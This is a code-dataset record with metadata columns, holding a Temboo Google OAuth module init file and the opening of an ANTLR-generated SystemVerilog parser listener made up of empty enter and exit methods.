hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7ccc320548cc3532a16790b1400d23010cb9ea34
| 312
|
py
|
Python
|
temboo/core/Library/Google/OAuth/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 7
|
2016-03-07T02:07:21.000Z
|
2022-01-21T02:22:41.000Z
|
temboo/core/Library/Google/OAuth/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | null | null | null |
temboo/core/Library/Google/OAuth/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 8
|
2016-06-14T06:01:11.000Z
|
2020-04-22T09:21:44.000Z
|
from temboo.Library.Google.OAuth.FinalizeOAuth import FinalizeOAuth, FinalizeOAuthInputSet, FinalizeOAuthResultSet, FinalizeOAuthChoreographyExecution
from temboo.Library.Google.OAuth.InitializeOAuth import InitializeOAuth, InitializeOAuthInputSet, InitializeOAuthResultSet, InitializeOAuthChoreographyExecution
| 104
| 160
| 0.910256
| 22
| 312
| 12.909091
| 0.636364
| 0.070423
| 0.119718
| 0.161972
| 0.197183
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.044872
| 312
| 2
| 161
| 156
| 0.95302
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
7cf09c10f24fe12d8b17049e5ecec3098c3ef933
| 274,330
|
py
|
Python
|
verilog_langserver/verilog_parser/antlr_build/diagnosis/SystemVerilogListener.py
|
eirikpre/verilog-langserver
|
e18545b139e40fe935bad430daf43e70553003a4
|
[
"MIT"
] | 1
|
2020-09-24T02:30:10.000Z
|
2020-09-24T02:30:10.000Z
|
verilog_langserver/verilog_parser/antlr_build/diagnosis/SystemVerilogListener.py
|
eirikpre/verilog-langserver
|
e18545b139e40fe935bad430daf43e70553003a4
|
[
"MIT"
] | null | null | null |
verilog_langserver/verilog_parser/antlr_build/diagnosis/SystemVerilogListener.py
|
eirikpre/verilog-langserver
|
e18545b139e40fe935bad430daf43e70553003a4
|
[
"MIT"
] | null | null | null |
# Generated from C:\Users\eirik\Desktop\verilog-langserver\verilog_langserver\verilog_parser/grammar/diagnosis/SystemVerilog.g4 by ANTLR 4.8
from antlr4 import *
if __name__ is not None and "." in __name__:
from .SystemVerilogParser import SystemVerilogParser
else:
from SystemVerilogParser import SystemVerilogParser
# This class defines a complete listener for a parse tree produced by SystemVerilogParser.
class SystemVerilogListener(ParseTreeListener):
# Enter a parse tree produced by SystemVerilogParser#system_verilog_text.
def enterSystem_verilog_text(self, ctx:SystemVerilogParser.System_verilog_textContext):
pass
# Exit a parse tree produced by SystemVerilogParser#system_verilog_text.
def exitSystem_verilog_text(self, ctx:SystemVerilogParser.System_verilog_textContext):
pass
# Enter a parse tree produced by SystemVerilogParser#source_text.
def enterSource_text(self, ctx:SystemVerilogParser.Source_textContext):
pass
# Exit a parse tree produced by SystemVerilogParser#source_text.
def exitSource_text(self, ctx:SystemVerilogParser.Source_textContext):
pass
# Enter a parse tree produced by SystemVerilogParser#description.
def enterDescription(self, ctx:SystemVerilogParser.DescriptionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#description.
def exitDescription(self, ctx:SystemVerilogParser.DescriptionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#module_nonansi_header.
def enterModule_nonansi_header(self, ctx:SystemVerilogParser.Module_nonansi_headerContext):
pass
# Exit a parse tree produced by SystemVerilogParser#module_nonansi_header.
def exitModule_nonansi_header(self, ctx:SystemVerilogParser.Module_nonansi_headerContext):
pass
# Enter a parse tree produced by SystemVerilogParser#module_ansi_header.
def enterModule_ansi_header(self, ctx:SystemVerilogParser.Module_ansi_headerContext):
pass
# Exit a parse tree produced by SystemVerilogParser#module_ansi_header.
def exitModule_ansi_header(self, ctx:SystemVerilogParser.Module_ansi_headerContext):
pass
# Enter a parse tree produced by SystemVerilogParser#module_declaration.
def enterModule_declaration(self, ctx:SystemVerilogParser.Module_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#module_declaration.
def exitModule_declaration(self, ctx:SystemVerilogParser.Module_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#module_keyword.
def enterModule_keyword(self, ctx:SystemVerilogParser.Module_keywordContext):
pass
# Exit a parse tree produced by SystemVerilogParser#module_keyword.
def exitModule_keyword(self, ctx:SystemVerilogParser.Module_keywordContext):
pass
# Enter a parse tree produced by SystemVerilogParser#interface_declaration.
def enterInterface_declaration(self, ctx:SystemVerilogParser.Interface_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#interface_declaration.
def exitInterface_declaration(self, ctx:SystemVerilogParser.Interface_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#interface_nonansi_header.
def enterInterface_nonansi_header(self, ctx:SystemVerilogParser.Interface_nonansi_headerContext):
pass
# Exit a parse tree produced by SystemVerilogParser#interface_nonansi_header.
def exitInterface_nonansi_header(self, ctx:SystemVerilogParser.Interface_nonansi_headerContext):
pass
# Enter a parse tree produced by SystemVerilogParser#interface_ansi_header.
def enterInterface_ansi_header(self, ctx:SystemVerilogParser.Interface_ansi_headerContext):
pass
# Exit a parse tree produced by SystemVerilogParser#interface_ansi_header.
def exitInterface_ansi_header(self, ctx:SystemVerilogParser.Interface_ansi_headerContext):
pass
# Enter a parse tree produced by SystemVerilogParser#program_declaration.
def enterProgram_declaration(self, ctx:SystemVerilogParser.Program_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#program_declaration.
def exitProgram_declaration(self, ctx:SystemVerilogParser.Program_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#program_nonansi_header.
def enterProgram_nonansi_header(self, ctx:SystemVerilogParser.Program_nonansi_headerContext):
pass
# Exit a parse tree produced by SystemVerilogParser#program_nonansi_header.
def exitProgram_nonansi_header(self, ctx:SystemVerilogParser.Program_nonansi_headerContext):
pass
# Enter a parse tree produced by SystemVerilogParser#program_ansi_header.
def enterProgram_ansi_header(self, ctx:SystemVerilogParser.Program_ansi_headerContext):
pass
# Exit a parse tree produced by SystemVerilogParser#program_ansi_header.
def exitProgram_ansi_header(self, ctx:SystemVerilogParser.Program_ansi_headerContext):
pass
# Enter a parse tree produced by SystemVerilogParser#checker_declaration.
def enterChecker_declaration(self, ctx:SystemVerilogParser.Checker_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#checker_declaration.
def exitChecker_declaration(self, ctx:SystemVerilogParser.Checker_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#class_declaration.
def enterClass_declaration(self, ctx:SystemVerilogParser.Class_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#class_declaration.
def exitClass_declaration(self, ctx:SystemVerilogParser.Class_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#interface_class_type.
def enterInterface_class_type(self, ctx:SystemVerilogParser.Interface_class_typeContext):
pass
# Exit a parse tree produced by SystemVerilogParser#interface_class_type.
def exitInterface_class_type(self, ctx:SystemVerilogParser.Interface_class_typeContext):
pass
# Enter a parse tree produced by SystemVerilogParser#interface_class_declaration.
def enterInterface_class_declaration(self, ctx:SystemVerilogParser.Interface_class_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#interface_class_declaration.
def exitInterface_class_declaration(self, ctx:SystemVerilogParser.Interface_class_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#interface_class_item.
def enterInterface_class_item(self, ctx:SystemVerilogParser.Interface_class_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#interface_class_item.
def exitInterface_class_item(self, ctx:SystemVerilogParser.Interface_class_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#interface_class_method.
def enterInterface_class_method(self, ctx:SystemVerilogParser.Interface_class_methodContext):
pass
# Exit a parse tree produced by SystemVerilogParser#interface_class_method.
def exitInterface_class_method(self, ctx:SystemVerilogParser.Interface_class_methodContext):
pass
# Enter a parse tree produced by SystemVerilogParser#package_declaration.
def enterPackage_declaration(self, ctx:SystemVerilogParser.Package_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#package_declaration.
def exitPackage_declaration(self, ctx:SystemVerilogParser.Package_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#timeunits_declaration.
def enterTimeunits_declaration(self, ctx:SystemVerilogParser.Timeunits_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#timeunits_declaration.
def exitTimeunits_declaration(self, ctx:SystemVerilogParser.Timeunits_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#timescale_compiler_directive.
def enterTimescale_compiler_directive(self, ctx:SystemVerilogParser.Timescale_compiler_directiveContext):
pass
# Exit a parse tree produced by SystemVerilogParser#timescale_compiler_directive.
def exitTimescale_compiler_directive(self, ctx:SystemVerilogParser.Timescale_compiler_directiveContext):
pass
# Enter a parse tree produced by SystemVerilogParser#time_precision.
def enterTime_precision(self, ctx:SystemVerilogParser.Time_precisionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#time_precision.
def exitTime_precision(self, ctx:SystemVerilogParser.Time_precisionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#include_compiler_directive.
def enterInclude_compiler_directive(self, ctx:SystemVerilogParser.Include_compiler_directiveContext):
pass
# Exit a parse tree produced by SystemVerilogParser#include_compiler_directive.
def exitInclude_compiler_directive(self, ctx:SystemVerilogParser.Include_compiler_directiveContext):
pass
# Enter a parse tree produced by SystemVerilogParser#parameter_port_list.
def enterParameter_port_list(self, ctx:SystemVerilogParser.Parameter_port_listContext):
pass
# Exit a parse tree produced by SystemVerilogParser#parameter_port_list.
def exitParameter_port_list(self, ctx:SystemVerilogParser.Parameter_port_listContext):
pass
# Enter a parse tree produced by SystemVerilogParser#parameter_port_declaration.
def enterParameter_port_declaration(self, ctx:SystemVerilogParser.Parameter_port_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#parameter_port_declaration.
def exitParameter_port_declaration(self, ctx:SystemVerilogParser.Parameter_port_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#list_of_ports.
def enterList_of_ports(self, ctx:SystemVerilogParser.List_of_portsContext):
pass
# Exit a parse tree produced by SystemVerilogParser#list_of_ports.
def exitList_of_ports(self, ctx:SystemVerilogParser.List_of_portsContext):
pass
# Enter a parse tree produced by SystemVerilogParser#list_of_port_declarations.
def enterList_of_port_declarations(self, ctx:SystemVerilogParser.List_of_port_declarationsContext):
pass
# Exit a parse tree produced by SystemVerilogParser#list_of_port_declarations.
def exitList_of_port_declarations(self, ctx:SystemVerilogParser.List_of_port_declarationsContext):
pass
# Enter a parse tree produced by SystemVerilogParser#port_declaration.
def enterPort_declaration(self, ctx:SystemVerilogParser.Port_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#port_declaration.
def exitPort_declaration(self, ctx:SystemVerilogParser.Port_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#port.
def enterPort(self, ctx:SystemVerilogParser.PortContext):
pass
# Exit a parse tree produced by SystemVerilogParser#port.
def exitPort(self, ctx:SystemVerilogParser.PortContext):
pass
# Enter a parse tree produced by SystemVerilogParser#port_expression.
def enterPort_expression(self, ctx:SystemVerilogParser.Port_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#port_expression.
def exitPort_expression(self, ctx:SystemVerilogParser.Port_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#port_reference.
def enterPort_reference(self, ctx:SystemVerilogParser.Port_referenceContext):
pass
# Exit a parse tree produced by SystemVerilogParser#port_reference.
def exitPort_reference(self, ctx:SystemVerilogParser.Port_referenceContext):
pass
# Enter a parse tree produced by SystemVerilogParser#port_direction.
def enterPort_direction(self, ctx:SystemVerilogParser.Port_directionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#port_direction.
def exitPort_direction(self, ctx:SystemVerilogParser.Port_directionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#net_port_header.
def enterNet_port_header(self, ctx:SystemVerilogParser.Net_port_headerContext):
pass
# Exit a parse tree produced by SystemVerilogParser#net_port_header.
def exitNet_port_header(self, ctx:SystemVerilogParser.Net_port_headerContext):
pass
# Enter a parse tree produced by SystemVerilogParser#variable_port_header.
def enterVariable_port_header(self, ctx:SystemVerilogParser.Variable_port_headerContext):
pass
# Exit a parse tree produced by SystemVerilogParser#variable_port_header.
def exitVariable_port_header(self, ctx:SystemVerilogParser.Variable_port_headerContext):
pass
# Enter a parse tree produced by SystemVerilogParser#interface_port_header.
def enterInterface_port_header(self, ctx:SystemVerilogParser.Interface_port_headerContext):
pass
# Exit a parse tree produced by SystemVerilogParser#interface_port_header.
def exitInterface_port_header(self, ctx:SystemVerilogParser.Interface_port_headerContext):
pass
# Enter a parse tree produced by SystemVerilogParser#ansi_port_declaration.
def enterAnsi_port_declaration(self, ctx:SystemVerilogParser.Ansi_port_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#ansi_port_declaration.
def exitAnsi_port_declaration(self, ctx:SystemVerilogParser.Ansi_port_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#elaboration_system_task.
def enterElaboration_system_task(self, ctx:SystemVerilogParser.Elaboration_system_taskContext):
pass
# Exit a parse tree produced by SystemVerilogParser#elaboration_system_task.
def exitElaboration_system_task(self, ctx:SystemVerilogParser.Elaboration_system_taskContext):
pass
# Enter a parse tree produced by SystemVerilogParser#finish_number.
def enterFinish_number(self, ctx:SystemVerilogParser.Finish_numberContext):
pass
# Exit a parse tree produced by SystemVerilogParser#finish_number.
def exitFinish_number(self, ctx:SystemVerilogParser.Finish_numberContext):
pass
# Enter a parse tree produced by SystemVerilogParser#module_common_item.
def enterModule_common_item(self, ctx:SystemVerilogParser.Module_common_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#module_common_item.
def exitModule_common_item(self, ctx:SystemVerilogParser.Module_common_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#simulation_control_task.
def enterSimulation_control_task(self, ctx:SystemVerilogParser.Simulation_control_taskContext):
pass
# Exit a parse tree produced by SystemVerilogParser#simulation_control_task.
def exitSimulation_control_task(self, ctx:SystemVerilogParser.Simulation_control_taskContext):
pass
# Enter a parse tree produced by SystemVerilogParser#module_item.
def enterModule_item(self, ctx:SystemVerilogParser.Module_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#module_item.
def exitModule_item(self, ctx:SystemVerilogParser.Module_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#module_or_generate_item.
def enterModule_or_generate_item(self, ctx:SystemVerilogParser.Module_or_generate_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#module_or_generate_item.
def exitModule_or_generate_item(self, ctx:SystemVerilogParser.Module_or_generate_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#module_or_generate_item_declaration.
def enterModule_or_generate_item_declaration(self, ctx:SystemVerilogParser.Module_or_generate_item_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#module_or_generate_item_declaration.
def exitModule_or_generate_item_declaration(self, ctx:SystemVerilogParser.Module_or_generate_item_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#non_port_module_item.
def enterNon_port_module_item(self, ctx:SystemVerilogParser.Non_port_module_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#non_port_module_item.
def exitNon_port_module_item(self, ctx:SystemVerilogParser.Non_port_module_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#parameter_override.
def enterParameter_override(self, ctx:SystemVerilogParser.Parameter_overrideContext):
pass
# Exit a parse tree produced by SystemVerilogParser#parameter_override.
def exitParameter_override(self, ctx:SystemVerilogParser.Parameter_overrideContext):
pass
# Enter a parse tree produced by SystemVerilogParser#bind_directive.
def enterBind_directive(self, ctx:SystemVerilogParser.Bind_directiveContext):
pass
# Exit a parse tree produced by SystemVerilogParser#bind_directive.
def exitBind_directive(self, ctx:SystemVerilogParser.Bind_directiveContext):
pass
# Enter a parse tree produced by SystemVerilogParser#bind_target_scope.
def enterBind_target_scope(self, ctx:SystemVerilogParser.Bind_target_scopeContext):
pass
# Exit a parse tree produced by SystemVerilogParser#bind_target_scope.
def exitBind_target_scope(self, ctx:SystemVerilogParser.Bind_target_scopeContext):
pass
# Enter a parse tree produced by SystemVerilogParser#bind_target_instance.
def enterBind_target_instance(self, ctx:SystemVerilogParser.Bind_target_instanceContext):
pass
# Exit a parse tree produced by SystemVerilogParser#bind_target_instance.
def exitBind_target_instance(self, ctx:SystemVerilogParser.Bind_target_instanceContext):
pass
# Enter a parse tree produced by SystemVerilogParser#bind_target_instance_list.
def enterBind_target_instance_list(self, ctx:SystemVerilogParser.Bind_target_instance_listContext):
pass
# Exit a parse tree produced by SystemVerilogParser#bind_target_instance_list.
def exitBind_target_instance_list(self, ctx:SystemVerilogParser.Bind_target_instance_listContext):
pass
# Enter a parse tree produced by SystemVerilogParser#bind_instantiation.
def enterBind_instantiation(self, ctx:SystemVerilogParser.Bind_instantiationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#bind_instantiation.
def exitBind_instantiation(self, ctx:SystemVerilogParser.Bind_instantiationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#config_declaration.
def enterConfig_declaration(self, ctx:SystemVerilogParser.Config_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#config_declaration.
def exitConfig_declaration(self, ctx:SystemVerilogParser.Config_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#design_statement.
def enterDesign_statement(self, ctx:SystemVerilogParser.Design_statementContext):
pass
# Exit a parse tree produced by SystemVerilogParser#design_statement.
def exitDesign_statement(self, ctx:SystemVerilogParser.Design_statementContext):
pass
# Enter a parse tree produced by SystemVerilogParser#config_rule_statement.
def enterConfig_rule_statement(self, ctx:SystemVerilogParser.Config_rule_statementContext):
pass
# Exit a parse tree produced by SystemVerilogParser#config_rule_statement.
def exitConfig_rule_statement(self, ctx:SystemVerilogParser.Config_rule_statementContext):
pass
# Enter a parse tree produced by SystemVerilogParser#default_clause.
def enterDefault_clause(self, ctx:SystemVerilogParser.Default_clauseContext):
pass
# Exit a parse tree produced by SystemVerilogParser#default_clause.
def exitDefault_clause(self, ctx:SystemVerilogParser.Default_clauseContext):
pass
# Enter a parse tree produced by SystemVerilogParser#inst_clause.
def enterInst_clause(self, ctx:SystemVerilogParser.Inst_clauseContext):
pass
# Exit a parse tree produced by SystemVerilogParser#inst_clause.
def exitInst_clause(self, ctx:SystemVerilogParser.Inst_clauseContext):
pass
# Enter a parse tree produced by SystemVerilogParser#inst_name.
def enterInst_name(self, ctx:SystemVerilogParser.Inst_nameContext):
pass
# Exit a parse tree produced by SystemVerilogParser#inst_name.
def exitInst_name(self, ctx:SystemVerilogParser.Inst_nameContext):
pass
# Enter a parse tree produced by SystemVerilogParser#cell_clause.
def enterCell_clause(self, ctx:SystemVerilogParser.Cell_clauseContext):
pass
# Exit a parse tree produced by SystemVerilogParser#cell_clause.
def exitCell_clause(self, ctx:SystemVerilogParser.Cell_clauseContext):
pass
# Enter a parse tree produced by SystemVerilogParser#liblist_clause.
def enterLiblist_clause(self, ctx:SystemVerilogParser.Liblist_clauseContext):
pass
# Exit a parse tree produced by SystemVerilogParser#liblist_clause.
def exitLiblist_clause(self, ctx:SystemVerilogParser.Liblist_clauseContext):
pass
# Enter a parse tree produced by SystemVerilogParser#use_clause.
def enterUse_clause(self, ctx:SystemVerilogParser.Use_clauseContext):
pass
# Exit a parse tree produced by SystemVerilogParser#use_clause.
def exitUse_clause(self, ctx:SystemVerilogParser.Use_clauseContext):
pass
# Enter a parse tree produced by SystemVerilogParser#interface_or_generate_item.
def enterInterface_or_generate_item(self, ctx:SystemVerilogParser.Interface_or_generate_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#interface_or_generate_item.
def exitInterface_or_generate_item(self, ctx:SystemVerilogParser.Interface_or_generate_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#extern_tf_declaration.
def enterExtern_tf_declaration(self, ctx:SystemVerilogParser.Extern_tf_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#extern_tf_declaration.
def exitExtern_tf_declaration(self, ctx:SystemVerilogParser.Extern_tf_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#interface_item.
def enterInterface_item(self, ctx:SystemVerilogParser.Interface_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#interface_item.
def exitInterface_item(self, ctx:SystemVerilogParser.Interface_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#non_port_interface_item.
def enterNon_port_interface_item(self, ctx:SystemVerilogParser.Non_port_interface_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#non_port_interface_item.
def exitNon_port_interface_item(self, ctx:SystemVerilogParser.Non_port_interface_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#program_item.
def enterProgram_item(self, ctx:SystemVerilogParser.Program_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#program_item.
def exitProgram_item(self, ctx:SystemVerilogParser.Program_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#non_port_program_item.
def enterNon_port_program_item(self, ctx:SystemVerilogParser.Non_port_program_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#non_port_program_item.
def exitNon_port_program_item(self, ctx:SystemVerilogParser.Non_port_program_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#program_generate_item.
def enterProgram_generate_item(self, ctx:SystemVerilogParser.Program_generate_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#program_generate_item.
def exitProgram_generate_item(self, ctx:SystemVerilogParser.Program_generate_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#checker_port_list.
def enterChecker_port_list(self, ctx:SystemVerilogParser.Checker_port_listContext):
pass
# Exit a parse tree produced by SystemVerilogParser#checker_port_list.
def exitChecker_port_list(self, ctx:SystemVerilogParser.Checker_port_listContext):
pass
# Enter a parse tree produced by SystemVerilogParser#checker_port_item.
def enterChecker_port_item(self, ctx:SystemVerilogParser.Checker_port_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#checker_port_item.
def exitChecker_port_item(self, ctx:SystemVerilogParser.Checker_port_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#checker_port_direction.
def enterChecker_port_direction(self, ctx:SystemVerilogParser.Checker_port_directionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#checker_port_direction.
def exitChecker_port_direction(self, ctx:SystemVerilogParser.Checker_port_directionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#checker_or_generate_item.
def enterChecker_or_generate_item(self, ctx:SystemVerilogParser.Checker_or_generate_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#checker_or_generate_item.
def exitChecker_or_generate_item(self, ctx:SystemVerilogParser.Checker_or_generate_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#checker_or_generate_item_declaration.
def enterChecker_or_generate_item_declaration(self, ctx:SystemVerilogParser.Checker_or_generate_item_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#checker_or_generate_item_declaration.
def exitChecker_or_generate_item_declaration(self, ctx:SystemVerilogParser.Checker_or_generate_item_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#checker_generate_item.
def enterChecker_generate_item(self, ctx:SystemVerilogParser.Checker_generate_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#checker_generate_item.
def exitChecker_generate_item(self, ctx:SystemVerilogParser.Checker_generate_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#class_item.
def enterClass_item(self, ctx:SystemVerilogParser.Class_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#class_item.
def exitClass_item(self, ctx:SystemVerilogParser.Class_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#class_property.
def enterClass_property(self, ctx:SystemVerilogParser.Class_propertyContext):
pass
# Exit a parse tree produced by SystemVerilogParser#class_property.
def exitClass_property(self, ctx:SystemVerilogParser.Class_propertyContext):
pass
# Enter a parse tree produced by SystemVerilogParser#class_method.
def enterClass_method(self, ctx:SystemVerilogParser.Class_methodContext):
pass
# Exit a parse tree produced by SystemVerilogParser#class_method.
def exitClass_method(self, ctx:SystemVerilogParser.Class_methodContext):
pass
